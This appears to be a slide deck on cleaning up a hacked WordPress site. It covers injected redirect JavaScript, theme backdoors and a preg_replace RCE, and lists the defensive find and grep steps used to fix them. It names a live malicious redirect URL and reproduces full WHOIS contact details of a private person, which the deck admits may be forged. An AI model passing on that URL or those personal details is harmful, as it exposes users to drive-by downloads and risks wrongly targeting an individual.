Securing hacked website
last week incident

What happened?
Richard, a grad student notified that there's an issue with one website
(http://www.bnaijacobjc.com/) , and he received credentials next day from the owner of the
website, so we can help them fix it.
Basically, anyone searching for this website from Google or any backlinking to
this website, were being redirected to Drive-By Attack, Video websites,
Advertisements, etc by malicious script injected in website.
And we fixed it finally after numerous countermeasures!

Multiple Issues
Theme with malicious JS to redirect users for advertisement (http://portal-b.pw/XcTyTp)
^ NSFW: redirects to Drive-By downloads, Advertisements, Pron*
Old Wordpress Version
● Found Multiple Backdoors, which can be used by an attacker to regain access
Exploited RCE vulnerability in preg_replace function in PHP

Fixes / Countermeasures
Identified, ordered recently changed files and removed malicious files
Listing files modified in last 3 days $ find . -mtime -3
Updated Wordpress and installed Security Scanner plugins
Acunetix Secure WordPress
Wordfence Security
Analyzed Traffic pattern through Chrome Developer Tools
Throttled Network Traffic to Check multiple Redirects
Identified backdoor in one of the theme and removed it
$ grep -nri "_wp_http_referer" .
$ grep -nri "portal-b.pw" .

Infrastructure/Access Level Used for fixes:
GoDaddy Hosting with cPanel
phpMyAdmin (DB access) to reset wp-admin credentials
SSH access to execute CLI commands (Linux)

Some gatherings about attacker // Appears to be using pseudonym
● portal-b.pw domain used to circulate advertisement of all kind.
WHOIS on domain revealed someone in RU (could be forged information)
ID: C97505165-CNIC
Name: Dzhamaldin Budunov
Organization: Private Person
Street: molodezhnaya 16/2
City: s. Sokur
State/Province: Saratovskaya oblast
Postal Code: 421994
Country: RU
Phone: +7.9192930122
Email: ovodnevay@rambler.ru

Questions ?!
By Mayur Pipaliya (mpipaliya) at Cyber Security Center, SPU / Nov’16